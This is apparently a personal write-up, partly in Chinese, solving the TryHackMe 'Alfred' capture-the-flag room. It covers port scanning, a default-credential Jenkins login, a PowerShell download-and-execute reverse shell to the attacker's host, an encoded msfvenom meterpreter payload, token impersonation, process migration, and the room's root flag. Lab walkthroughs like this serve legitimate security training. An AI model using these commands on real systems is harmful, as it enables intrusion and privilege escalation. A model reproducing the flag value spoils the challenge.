URL : https://tryhackme.com/room/alfred
IP : 10.10.244.238
Initial access
rustscan -a 10.10.244.238
- 80
- 3389
- 8080
nmap -A -p80,3389,8080 10.10.244.238-
- 發現 8080 的 Jenkins 是Jetty 9.4.z-SNAPSHOT
- 但找不到相關的 Exploit80 port 首頁-

- 看起來沒什麼特別的東西QQ
python3 dirsearch.py -u http://10.10.244.238/掃了之後也沒啥東西8080 port 登入頁面-
- 發現會掃出一些404,但沒啥幫助

進入 Jenkins
- 看到官方的 hint 寫
*****:*****直接通靈猜admin:admin - 就進去了 ……
- 好無聊= =透過 Deploy 的 build code 輸入指令-
whoami 
systeminfo
準備 Windows Reverse Shell- 本機wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1nc -nvlp 7877靶機-powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.21.55:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.21.55 -Port 7877就成功接上了-
取得 uesr flag-
使用 msfvenom 產 meterperter reverse shell- msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.21.55 LPORT=7879 -f exe -o meow.exe
開啟 msfconsole準備接收-use exploit/multi/handlerset LHOST 10.13.21.55set LPORT 7879set PAYLOAD windows/meterpreter/reverse_tcpshow options確認參數是否正確
run等待接收下載並執行 meterpreter 的 shell-powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.21.55:8000/meow.exe','meow.exe')"Start-Process "meow.exe"msf 接上了!-
What is the final size of the exe payload that you generated?- 
- 73802meterperter-
getuid回傳Alfred\bruce``load incognito``list_tokens -g-
- 發現可以利用
BUILTIN\Administrators``impersonate_token "BUILTIN\Administrators"- 成功! 
- 再次
whoami
Migrate 到 system- ps
- 準備寄生到
services.exe``migrate 668-
- 成功!輸入
shell-cd system type root.txt- 取得 root flag
dff0f748678f280250f25a45b8046b4a